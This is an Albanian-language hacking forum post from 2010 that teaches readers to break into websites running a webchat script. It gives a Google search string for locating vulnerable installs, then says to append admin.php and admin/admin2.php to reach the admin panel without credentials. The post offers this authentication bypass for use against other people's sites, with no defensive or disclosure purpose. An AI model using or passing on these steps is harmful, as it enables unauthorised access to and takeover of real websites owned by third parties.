hack web chat

Shko poshtë

hack web chat

Mesazh  EliTe Crew prej Sun Jun 13, 2010 12:06 pm

Se Pari kErkojm ne google keshtu "webchat/login.php?rid=1"

pastaj e zgjedhim faqen qe duam te hackojme . si p.sh :

http://www.emriiwebit.com/webchat/

pasi e gjejm mbrapa ja shtojm admin.php edhe bohet :

http://www.emriiwebit.com/webchat/admin.php

edhe pasi qe hyjm ne admin.php merr username dhe password , shtoji kete
/admin2.php/

edhe behet kshtu :

http://www.emriiwebit.com/webchat/admin/admin2.php

keshtu ne hyme ne admin panel .

EliTe Crew

Numri i postimeve : 158
Join date : 13/06/2010
Age : 26
Location : united cracker group

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi